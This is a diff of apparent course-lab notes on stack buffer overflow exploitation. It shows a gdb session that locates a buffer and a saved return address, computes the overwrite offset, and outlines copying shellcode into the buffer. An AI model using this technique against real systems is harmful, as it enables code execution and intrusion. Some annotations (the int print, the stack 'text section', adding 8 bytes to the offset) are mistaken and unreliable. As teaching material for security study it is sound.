jelc53 · April 8, 2023 05:22
diff --git a/gdb_stack.sh b/gdb_stack.sh
 # -----------------------------------------------------------------------------------------
 # Example application of gdb to understand address logic of buffer overflow exploit
 # Our exploit creates a buffer, writes to file, creates target with file as arg
 # Target then reads file to a buffer and then uses the data in that file to open shell 
 # -----------------------------------------------------------------------------------------

 # First compile everything ----------------------------------------------------------------
 cd proj1/xploits/
 make

 # Second, run in debugger -----------------------------------------------------------------
 # To do this, run gdb on compiled executible file
 gdb ./xploit1  # opens GNU gdb software

 (gdb) b foo # set breakpoint at vulnerable function 
 Function "foo" not defined.
 Make breakpoint pending on future shared library load? (y or [n]) y
 Breakpoint 1 (foo) pending.

 (gdb) r  # run gdb debugger
 Starting program: /home/user/proj1/xploits/xploit1 
 process 1129 is executing new program: /tmp/target1

 Breakpoint 1, foo (input=0x7fffffffdd40 "") at target1.c:16
 16	  bar(input, buf);

 (gdb) n  # next line of code
 (gdb) ni  # next assmebly instruction

 # Third, investigate stack frame ----------------------------------------------------------
 layout src  # shows view window with source code
 layout asm  # shows view window with assembly code
 ctrl+xa  # exit from source dode view

 (gdb) p &buf  # print address of buffer variable
 $1 = (char (*)[256]) 0x7fffffffdc20

 (gdb) info frame  # view contents of stack frame
 Stack level 0, frame at 0x7fffffffdd30:
 rip = 0x5555555551d1 in foo (target1.c:16); saved rip = 0x5555555552c4
 called by frame at 0x7fffffffed60
 source language c.
 Arglist at 0x7fffffffdd20, args: input=0x7fffffffdd40 ""
 Locals at 0x7fffffffdd20, Previous frames sp is 0x7fffffffdd30
 Saved registers:
 rbp at 0x7fffffffdd20, rip at 0x7fffffffdd28

 # Note for interpreting info frame console output:
 # - rip = 0x5555555551d1 is the address of code being executed from "text" section of stack 
 # - saved rip = 0x5555555552c4 is the return address of this stack frame
 # - registers store rbp of previous stack frame and current return address (rip) 

 # To confirm, rip register soters the saved rip (return address), run the following
 (gdb) x/gx 0x7fffffffdd28  # x = examine, /gx = giant word (8 bytes), @ given address 
 0x7fffffffdd28: 0x00005555555552c4

 # Fourth, address pointer arithmetic ---------------------------------------------------------
 # Want to understand how much we need to overflow to overwrite return address
 # To find bytes, we subtract address where ret is stored from address of our buffer local variable  
 (gdb) p/x 0x7fffffffdd28 - 0x7fffffffdc20  # print num bytes between two addresses as hex
 $3 = 0x108

 (gdb) p/x 0x7fffffffdd28 - 0x7fffffffdc20  # print num bytes between two addresses as int
 $3 = 264  # 264 bytes between base of buffer variable and (end of) return address
 # we add 8 bytes to 264 to get to base of return address in oder to overwrite

 # Additional tips and tricks -----------------------------------------------------------------
 # When checking to see if weve done the arithmetic correctly
 # try filling buffer with memset(exploit, 'U', sizeof(exploit)); 
 # re-compile xploit code and run to confirm we get a seg fault 
 $ ./xploit1
 Segmentation fault

 # Now, want to fill exploit with well-chosen ret (points back inside buffer)
 # and payload that executes useful code
 memcpy(exploit, shellcode, sizeof(shellcode)-1);  # shell code is c_str with null terminator at end
 # note, don't want null terminator because it'll cause strcpy to think it's found end of string and exit early
	# -----------------------------------------------------------------------------------------
	# Example application of gdb to understand address logic of buffer overflow exploit
	# Our exploit creates a buffer, writes to file, creates target with file as arg
	# Target then reads file to a buffer and then uses the data in that file to open shell
	# -----------------------------------------------------------------------------------------

	# First compile everything ----------------------------------------------------------------
	cd proj1/xploits/
	make

	# Second, run in debugger -----------------------------------------------------------------
	# To do this, run gdb on compiled executible file
	gdb ./xploit1 # opens GNU gdb software

	(gdb) b foo # set breakpoint at vulnerable function
	Function "foo" not defined.
	Make breakpoint pending on future shared library load? (y or [n]) y
	Breakpoint 1 (foo) pending.

	(gdb) r # run gdb debugger
	Starting program: /home/user/proj1/xploits/xploit1
	process 1129 is executing new program: /tmp/target1

	Breakpoint 1, foo (input=0x7fffffffdd40 "") at target1.c:16
	16 bar(input, buf);

	(gdb) n # next line of code
	(gdb) ni # next assmebly instruction

	# Third, investigate stack frame ----------------------------------------------------------
	layout src # shows view window with source code
	layout asm # shows view window with assembly code
	ctrl+xa # exit from source dode view

	(gdb) p &buf # print address of buffer variable
	$1 = (char (*)[256]) 0x7fffffffdc20

	(gdb) info frame # view contents of stack frame
	Stack level 0, frame at 0x7fffffffdd30:
	rip = 0x5555555551d1 in foo (target1.c:16); saved rip = 0x5555555552c4
	called by frame at 0x7fffffffed60
	source language c.
	Arglist at 0x7fffffffdd20, args: input=0x7fffffffdd40 ""
	Locals at 0x7fffffffdd20, Previous frames sp is 0x7fffffffdd30
	Saved registers:
	rbp at 0x7fffffffdd20, rip at 0x7fffffffdd28

	# Note for interpreting info frame console output:
	# - rip = 0x5555555551d1 is the address of code being executed from "text" section of stack
	# - saved rip = 0x5555555552c4 is the return address of this stack frame
	# - registers store rbp of previous stack frame and current return address (rip)

	# To confirm, rip register soters the saved rip (return address), run the following
	(gdb) x/gx 0x7fffffffdd28 # x = examine, /gx = giant word (8 bytes), @ given address
	0x7fffffffdd28: 0x00005555555552c4

	# Fourth, address pointer arithmetic ---------------------------------------------------------
	# Want to understand how much we need to overflow to overwrite return address
	# To find bytes, we subtract address where ret is stored from address of our buffer local variable
	(gdb) p/x 0x7fffffffdd28 - 0x7fffffffdc20 # print num bytes between two addresses as hex
	$3 = 0x108

	(gdb) p/x 0x7fffffffdd28 - 0x7fffffffdc20 # print num bytes between two addresses as int
	$3 = 264 # 264 bytes between base of buffer variable and (end of) return address
	# we add 8 bytes to 264 to get to base of return address in oder to overwrite

	# Additional tips and tricks -----------------------------------------------------------------
	# When checking to see if weve done the arithmetic correctly
	# try filling buffer with memset(exploit, 'U', sizeof(exploit));
	# re-compile xploit code and run to confirm we get a seg fault
	$ ./xploit1
	Segmentation fault

	# Now, want to fill exploit with well-chosen ret (points back inside buffer)
	# and payload that executes useful code
	memcpy(exploit, shellcode, sizeof(shellcode)-1); # shell code is c_str with null terminator at end
	# note, don't want null terminator because it'll cause strcpy to think it's found end of string and exit early